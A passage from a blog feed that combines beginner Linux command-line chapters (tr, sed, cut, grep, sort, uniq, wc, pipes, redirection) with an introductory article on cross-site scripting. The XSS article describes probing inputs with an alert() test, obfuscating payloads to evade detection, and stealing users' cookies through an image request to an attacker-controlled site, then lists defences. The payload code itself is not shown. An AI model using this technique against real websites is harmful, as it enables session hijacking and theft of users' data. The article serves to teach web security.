Remember our file “names.txt” from the first example? All names were written in lowercase except for their first letters. Well, I personally prefer names to be in uppercase.

So, to make this file more to my taste, I’m going to use “tr” to replace all lowercase letters with their uppercase counterparts, and then save the result to a new file “namesUp.txt“.

$ cat names.txt | tr a-z A-Z > namesUp.txt

This command will not output anything to the terminal. This is because we have redirected the standard output to the file “namesUp.txt” using the “greater-than” (>) symbol.

If you’re having difficulties comprehending this command, then it is probably because you have skipped the chapter about piping and redirection. If that’s the case, then I invite you to go back. read that chapter, and make sure to fully understand the concepts discussed there before moving on.

Now, when we read the new file “namesUp.txt“, we can see that the names are now in uppercase letters.

$ cat namesUp.txt
JAMES
MARY
PATRICIA
ROBERT
JOHN

Advanced Text Transformation

There is another, more powerful, command that allows you to perform advanced text manipulation operations. This command is ‘sed‘, which stands for Stream EDitor.

The ‘sed‘ command allows you to automatically find and replace certain strings on a given file without having to open it. Let’s see how we can do this.

For this section, we’ll consider a file named “input.txt” with the following content:

This is John.
John is currently learning Linux, and he's constantly improving.
With enough time and dedication, John will eventually become a Linux expert.

Now, let’s say we need to substitute all occurrences of “John” with “Robert” (Feel free to use your own name if you wish).

Using ‘sed’, we can easily perform this operation.

$ sed 's/John/Robert/g' input.txt

Here, we have executed the sed command followed by a string pattern placed within single quotes, and then the path to a file.

The string pattern (s/John/Robert/g) starts with the ‘s’ character, which means that we will be using substitution. After the first slash, we type the string that we want to replace (In this case, John), and then, after the second slash, the string that we’ll be replacing it with (Robert). Finally, after the third and last slash, we have added the ‘g’ character, which stands for global. By default, sed will only replace the first occurrence of the string pattern in the file. By adding ‘g’, we make sure that all occurrences are replaced.

Here is the result we get from this command.

$ sed 's/John/Robert/g' input.txt
This is Robert.
Robert is currently learning Linux, and he's constantly improving.
With enough time and dedication, Robert will eventually become a Linux expert.

We have reached the end of this chapter. We have covered most text processing commands that you can use in Linux.

In the next chapter, we are going to learn about regular expressions.

The post Chapter 9 – Advanced Data Processing appeared first on Patch The Net.

Introduction to Cross-Site Scripting (XSS)

spectnullbyte — Fri, 13 Aug 2021 21:55:14 +0000

This article presents a great introduction for anyone trying to learn about Cross-Site Scripting (or XSS). You don’t need to be an expert to follow along. However, you do need to know some basics about how the web works in order to gain the most from this article.

We will start first by learning about what Cross-Site Scripting is and what are its types. Then, we will explore the process of conducting an XSS attack. And finally, we will list some of the good practices that we can follow to prevent it.

Disclaimer: Please note that the information taught in this article is not intended to be used for anything other than legitimate and ethical purposes. As with all my other articles, the objective here is to further expand the security culture and to help defend and protect information systems against malicious actors.

So, with that being said, let’s begin!

What is Cross-Site Scripting (XSS)?

Cross-Site Scripting (XSS) is a type of vulnerability that affects web applications. It allows an attacker to send malicious code to a website. That same code is then sent to other users to be executed on their browsers.

When successful, an XSS attack can provide the attacker with sensitive information from other users’ browsers. For instance, the attacker can retrieve user cookies and session tokens, which they can then use to perform session hijacking.

Here is an illustration that should help you better understand the process of the attack.

Considering that end-users are generally trusting of the vulnerable website, they will be unsuspecting of the attack if it ever happens against them.

XSS Types

There are two main types of Cross-Site Scripting attacks: Persistent and reflected.

Persistent XSS

A persistent (Also called stored) XSS attack is the most dangerous of the two types. It occurs when the malicious script provided by the attacker is stored on the server-side of the web application. This code is then sent to other users every time they request the content associated with it.

For example, a comment section is one place where persistent XSS can occur. This is because websites store comments in a database on the server-side, and they retrieve and display them every time a user visits that section.

The above illustration is an example of a persistent XSS attack.

Reflected XSS

A reflected XSS attack is the least dangerous of the two types. In a reflected XSS scenario, the malicious script is sent to the web application and then presented to the user that submitted the request, and only to that user. The website doesn’t store anything on the server side.

A good example of where a reflected XSS attack can happen is a search form. Since only the user who provides a string in a search form can see that string in the response, an attacker won’t be able to perform a persistent XSS attack. The worst they can do is to conduct a reflected XSS attack.

This might not seem dangerous at first, but if a malicious actor combines it with a phishing attack, they can use it to retrieve sensitive information from other users.

How to perform a Cross-Site Scripting Attack

Now that we know what a Cross-Site Scripting attack is, let’s see how we can perform one.

First of all, we need to determine if our target website is vulnerable to XSS. To do so, we need to consider all points on the website where a user can provide input.

For each point, we can run a proof of concept payload that will confirm whether or not we have an XSS vulnerability. Most often, we can use the “alert()” Javascript function inside a script.

If the website is vulnerable to XSS, then an alert message should pop up with the “XSS!” message. This is all the proof that we need to confirm the vulnerability of our target.

You should note that most websites may detect and block the above payload. This does not mean that these websites aren’t vulnerable, it just means that you need to obfuscate the payload to evade detection.

Once we’ve determined the vulnerability of the website, you can run a payload that will send the user’s cookie to a webpage that you control.

The above payload will attempt to load an image from a website controlled by the attacker. The link of the image contains the cookie value of the target user. So, when it receives this request, the malicious website will log this value.

The attacker can then check the logs to retrieve the cookies of all users who connected to that website.

Protect against XSS

Here are some good practices that you should follow to protect your website against XSS attacks:

The web application should always validate user input, and that is, for every data provided by users. This process involves ensuring that the provided input is in the expected format. For example, if you are asking the user for their age on an input field, then you should expect the provided data to be a positive integer that is less than 120. Any value that is outside of this range shouldn’t be accepted.
Web applications can also use encoding to escape certain characters that aren’t supposed to be processed by the web browser. For example, if we want to embed user-provided input into an HTML element, we would need to HTML-encode it. That is, we need to convert HTML reserved characters into HTML entities (For example, ‘<‘ will be converted to ‘<’). Likewise, if we want to embed user-provided input into a Javascript data value, we would need to Javascript-encode it.
The HTTP Header can also provide a good layer of defense against XSS. The use of “Content-Type” and “X-Content-Type-Options” in response headers can limit the execution of scripts on a webpage.

We have covered the essentials in this article. So now, you should have a basic understanding of Cross-Site Scripting.

Nevertheless, there is more to XSS than what we have covered here. So you shouldn’t be content. At least not yet. I invite you to build on what we have discussed here and learn from other resources on the web. For instance, the OWASP and PortSwigger websites provide a good reference for this topic.

The post Introduction to Cross-Site Scripting (XSS) appeared first on Patch The Net.

Chapter 8 – Extract and Process Data

spectnullbyte — Tue, 10 Aug 2021 15:13:49 +0000

In this chapter, we are going to learn how to extract and process data from a file on Linux.

To test the examples given in this chapter, I will create a file that I will name “data.txt” containing a list of books, with their year of publication, author, and country of origin:

In Search of Lost Time, 1913, Marcel Proust, France
Ulysses, 1922, James Joyce, Ireland
Don Quixote, 1615, Miguel De Cervantes, Spain
The Great Gatsby, 1925, F. Scott Fitzgerald, United States
War and Peace, 1869, Leo Tolstoy, Russia

I invite you to create the same file on your local machine and copy the above content.

Extract Data

When it comes to extracting data from a file, there are two essential commands that you should know: cut and grep.

Extract Portions of lines

The command “cut” allows you to extract portions of each line on a given file depending on provided options. The resulted text is then sent to the standard output.

You should specify at least one option with the command so that it knows how to cut each line. Otherwise, it won’t work.

Let’s see how to use two of these options.

Extract by character

The “-c” flag specifies which characters to extract.

Here are a few examples to make things clear.

The following command will output the fifth character of each line:

$ cut -c 5 data.txt
e
s
Q
G
a

This command will output the third, sixth, and eighth character of each line:

$ cut -c 3,6,8 data.txt
 ac
ye,
nux
era
rn

And finally, this command will output all characters of each line positioned between the fourth and tenth position:

$ cut -c 4-10 data.txt
Search 
sses, 1
 Quixot
 Great 
 and Pe

As you can see from these examples, using the “-c” flag doesn’t separate between letters, commas, and spaces. Everything is considered a character.

Extract by field

To extract by field, you need to specify two essential parameters:

The delimiter (Using the “-d” flag) : This is how you tell the “cut” command which character separates the fields on each line.
The field number (Using the “-f” flag) : This is where you specify which field to extract.

Once again, a few examples will be more useful to you than plain explanations.

The following command will output the third field from our file (i.e. The author name):

$ cut -d ',' -f 3 data.txt
Marcel Proust
James Joyce
Miguel De Cervantes
F. Scott Fitzgerald
Leo Tolstoy

As you can see, I have specified comma (,) as the separator and I have selected the third field to extract.

If instead, we want to retrieve the title of the books, we can simply assign the value of 1 to the “-f” option.

$ cut -d ',' -f 1 data.txt
In Search of Lost Time
Ulysses
Don Quixote
The Great Gatsby
War and Peace

Now, what if we want to extract both the title of the book and its author?

Well, we can do that as well.

$ cut -d ',' -f 1,3 data.txt
In Search of Lost Time, Marcel Proust
Ulysses, James Joyce
Don Quixote, Miguel De Cervantes
The Great Gatsby, F. Scott Fitzgerald
War and Peace, Leo Tolstoy

I can go on and on with the examples, but I think the idea should be clear to you by now. I invite you to try to extract other fields on your own in order to familiarize yourself with the “cut” command.

Extract Lines

The grep command is a life-saver. I am certain that in the future, you will find yourself using it very often. Not only does it allow you to extract content from a file, but it is also very useful in finding files that contain certain words.

The basic syntax for using “grep” is very simple. Just type the command followed by the string to search for, and then the file where to search.

$ grep 'scott fitzgerald' data.txt

If you run the above command, then you shouldn’t get any input. This might be contrary to what you were expecting, especially that our file does contain ‘Scott Fitzgerald’.

The reason for this is that “grep” is, by default, a case-sensitive command. This means that it differentiates between uppercase and lowercase letters. Therefore, grep does not consider ‘Scott Fitzgerald’ to be the same string as ‘scott fitzgerald’.

Thankfully, we can add the flag “-i” to make the grep command case insensitive. By doing this, we can finally get the expected result:

$ grep -i 'scott fitzgerald' data.txt
The Great Gatsby, 1925, F. Scott Fitzgerald, United States

One other way we can use “grep” is by adding the “-v” flag. This will extract the non-matching lines. For instance, in the example below, we retrieved all the lines that don’t contain ‘scott fitzgerald’.

$ grep -vi 'scott fitzgerald' data.txt
In Search of Lost Time, 1913, Marcel Proust, France
Ulysses, 1922, James Joyce, Ireland
Don Quixote, 1615, Miguel De Cervantes, Spain
War and Peace, 1869, Leo Tolstoy, Russia

Before we wrap up this section about grep and data extraction, there is one last thing that I need to mention and that makes ‘grep’ special. And that is its support for Regular Expressions (Also known as Regex). Regex is very widely used as a way to specify search formats, and it can be very useful in finding certain string patterns. However, I am not going to cover it here, as that would make this a lengthy chapter. But rest assured, We will have a future chapter dedicated to regex.

Process Data

Sorting Lines

The sort command, as its name implies, allows you to sort a list of strings. It expects a list on its standard input, it sorts it and then sends it to its standard output.

If we run the command on our file “data.txt”, we should get an ordered set of lines.

$ sort data.txt
Don Quixote, 1615, Miguel De Cervantes, Spain
In Search of Lost Time, 1913, Marcel Proust, France
The Great Gatsby, 1925, F. Scott Fitzgerald, United States
Ulysses, 1922, James Joyce, Ireland
War and Peace, 1869, Leo Tolstoy, Russia

By default, the result is sorted alphabetically from A to Z. If we wanted to reverse the order (From Z to A), we can simply specify the -r flag.

$ sort -r data.txt
War and Peace, 1869, Leo Tolstoy, Russia
Ulysses, 1922, James Joyce, Ireland
The Great Gatsby, 1925, F. Scott Fitzgerald, United States
In Search of Lost Time, 1913, Marcel Proust, France
Don Quixote, 1615, Miguel De Cervantes, Spain

Now, let’s make things more interesting and try to sort the name of the authors (third column).

Let’s try this out:

$ cut -d "," -f 3 data.txt | sort
F. Scott Fitzgerald
James Joyce
Leo Tolstoy
Marcel Proust
Miguel De Cervantes

Sorting Numbers

To sort by numbers, and not alphabetically, we should add the -n flag. Otherwise, the numbers wouldn’t be sorted properly if they have different numbers of digits.

For example, let’s consider the following file, which I named “numbers.txt”:

If we try to sort it as we did before, the result wouldn’t be correct.

sort numbers.txt 
13
254
543
65
7
92

That’s because, as I mentioned earlier, sort orders alphabetically by default.

However, with the “-n” flag, we can force it to sort by numbers, as shown in the following example.

sort -n numbers.txt 
7
13
65
92
254
543

Remove duplicates

The command “uniq” is used to remove adjacent duplicate lines in a file. It is very simple to use, just type “uniq” followed by the name of the file.

However, as the command will only remove adjacent duplicate lines, only matching lines that are next to each other will be considered duplicates by the command and thus will be deduplicated.

So, to be effective, we need to sort the file first before providing it as input to “uniq”.

Here is a file that I named “users.txt”, which contains a list of users with some duplicates added here and there.

David
Alex
Maria
Carlos
Anna
Marco
Ana
Antonio
Daniel
Andrea
David
Laura
Ali
Jose
Sandra
Maria
Sara
Carlos
Ana
Michael

Now, let’s filter out to duplicates using “sort” and “uniq“:

$ sort users.txt | uniq
Alex
Ali
Ana
Andrea
Anna
Antonio
Carlos
Daniel
David
Jose
Laura
Marco
Maria
Michael
Sandra
Sara

Counting

The command “wc” (short for word counting) displays basic statistics about the content of the file provided in its standard input.

By default, it will show three values in the following order: The number of lines, the number of words, and the number of bytes.

$ wc data.txt
5 37 234 data.txt

If we don’t need all these values, and we’re only interested in the number of lines, we can use the “-l” flag as shown in the example below:

$ wc -l data.txt
5 data.txt

Similarly, specifying the “-w” flag will print the word count.

$ wc -w data.txt
37 data.txt

And to print out the number of characters, we can use the “-c” flag.

$ wc -c data.txt                                                                                                                                                                           
234 data.txt

We have reached the end of this chapter. We have covered 5 new commands to extract and process data in Linux: cut, grep, sort, uniq, and wc. Take some time to practice what you have learned here today, and make sure that you are comfortable with each of these commands before jumping into the next chapter.

The post Chapter 8 – Extract and Process Data appeared first on Patch The Net.

Chapter 7 – Piping and Redirection

spectnullbyte — Sun, 08 Aug 2021 10:09:58 +0000

Before we start, don’t be misled by the title of this chapter. I am not going to teach you about plumbing here. We are going to cover piping and redirection in Linux.

On a more serious note, if you have read and understood all previous chapters, then at this stage, you are no longer a beginner. You should by now be somewhat comfortable around a Linux system.

That being said, you will embark now on the second part of your journey.

From this chapter on, you will finally start to grasp the true power of Linux. You will be able to automate your workflows, manipulate text, extract and process data, and much more. All of this wouldn’t have been possible without the use of Redirection and Piping.

Data Streams

Before we discuss piping and redirections, we first need to understand a bit of theory about something called data streams.

In Linux, a data stream is the flow of data from a source to a destination. This can either be from one process to another, in which case that would be through a pipe; or, from a file to a process (or the other way around) which would be through a redirect.

Another way of looking at data streams is by thinking of them as links that join two ends. On one end, you may have your command output; and on the other end, you can either have the input to another command or to a file.

As a Linux user, you should distinguish between three standard data streams that are connected by default to every Linux program:

Stdin (Standard Input, identified by the value 0): This is the input that the program receives.
Stdout (Standard Output, identified by the value 1): This is the output of the program (On a terminal, whatever goes in stdout is by default displayed on the screen).
Stderr (Standard Error, identified by the value 2): This is where the program sends its error messages.

Here is a simple figure to better illustrate this:

Linux Data Streams

This is all the theory that we need to cover for now. In the rest of this chapter, we will learn how to manipulate these streams which will allow us to change their default terminations.

I promise you, this won’t be as boring as it sounds. Once complete this chapter, you will finally be able to appreciate the power of Linux (That is,… of course, If you haven’t already).

Piping

Piping is connecting the standard output (stdout) of a command to the standard input (stdin) of another command. We can do this using the pipe operator (|).

The pipe operator takes the output of the command on its left and sends it as an input to the command on its right.

Let’s say I run the following command :

$ ls -l

This will result in the following output :

No surprise there. I got a detailed list of the files that are in my current directory.

Now let’s apply what we’ve learned in this section. I will add a pipe operator followed by the head command (If you recall from our previous chapters, the head command outputs only the first 10 lines of a file),

$ ls -l | head

Well now, we get a different result. As you can see in the image below, the output includes only the 10 first lines on the terminal.

So what happened here is that the command on the left of the pipe (ls -l) sent its output to the command on the right (head) instead of displaying it directly on the screen. Then, after getting this output and treating it as any other input file, the head command only displays its first 10 lines.

Command Chaining

We can take this even one step further and use a series of pipes to chain multiple commands.

Building on our previous example, let’s say that I want to run a command that outputs only the line corresponding to file03.

We know how to display the first n lines using the head command.

$ ls -l | head -n 5

So, if we run the above command, we should get the following result.

Now if we add another pipe, piping this result into the tail command, then we can select the last line using the ‘-n’ flag.

$ ls -l | head -n 5 | tail -n 1

And this, right here, is where all the magic of Linux lies.

Note that we could have done this using grep, which is another powerful Linux command. However, since it wasn’t yet covered in this tutorial, it would be better to ignore it for the time being. But don’t worry, we’ll cover it soon enough in a future chapter.

Redirection

Writing output to a file

So far, whenever we execute a command, we see its output on the screen. This means that its stdout is connected to the screen terminal. However, this doesn’t have to be always the case.

We can redirect this output to a file by using the arrow pointing to the right (>) symbol, followed by the location of the file where we want to write the output.

Here is an example.

$ ls -l > output.txt

Although running the above command won’t display anything on the screen, this doesn’t mean that nothing happened. In fact, ls -l was executed, and then its output was stored in the file “output.txt“.

If you read the content of “output.txt”, you can see the output of our command.

Note that if the file “output.txt” exists already, then redirecting to it will overwrite its previous content. If you want to keep its previous content and store your output at the end of the file, then you should use two arrows instead of one.

$ ls -l >> output.txt

Reading from a file

You can read from a file and redirect its content to the input of a command using an arrow symbol pointing to the left (<), followed by the path to the file.

To illustrate this, I created a file called input.txt with the following content.

Now, we will use the sort command to, obviously, sort the above numbers by reading them directly from the above file.

We will cover “sort” in more detail in a future chapter. I brought it up here only as an example of how a command can take its input from a file.

Redirecting Errors

Before we close this chapter, we need to address the last of the three data streams that I introduced in the first section of this chapter.

If you remember, we said that programs have a separate stream where they send their errors. This means that we can process errors separately from the standard output.

This can be useful for certain commands that raise a lot of errors.

For example, if you remember from the last chapter, the “find” command can be used to search for a file in a specified path. However, this command can sometimes display a lot of errors when it tries to search in a directory that it cannot access due to a lack of permissions.

In the image below, I tried to search for the file ‘patchthenet’.

As you can see, the “find” command shows only the error messages. So, even if it did find the file that I was looking for, I wouldn’t be able to spot it among the sea of errors thrown at me.

So, one way to solve this problem is to send the stderr stream to a file so it does not appear on the screen.

The value of 2 refers to the stderr stream. So, here I am sending all the errors to a file called errors.txt, which leaves the terminal clean to display the desired output.

The only problem here, however, is that I ended up with the file ‘errors.txt’ which I would now have to remove.

/dev/null

Thankfully, I don’t have to create a new file to send my errors. Linux has a solution for this. There is an interesting file where you can send any type of output that you don’t need. This special file is located at /dev/null. Everything that you send there vanishes. Think of it like a black hole. Anything that goes in, gets destroyed.

Now, the final command should look like this:

And that’s it. Problem solved.

This wraps up the piping and redirection chapter. I recommend that you take some time to become comfortable with what we have covered so far. Once you feel ready, I’ll meet you in the next chapter where we start discussing how to extract and process data in Linux.

The post Chapter 7 – Piping and Redirection appeared first on Patch The Net.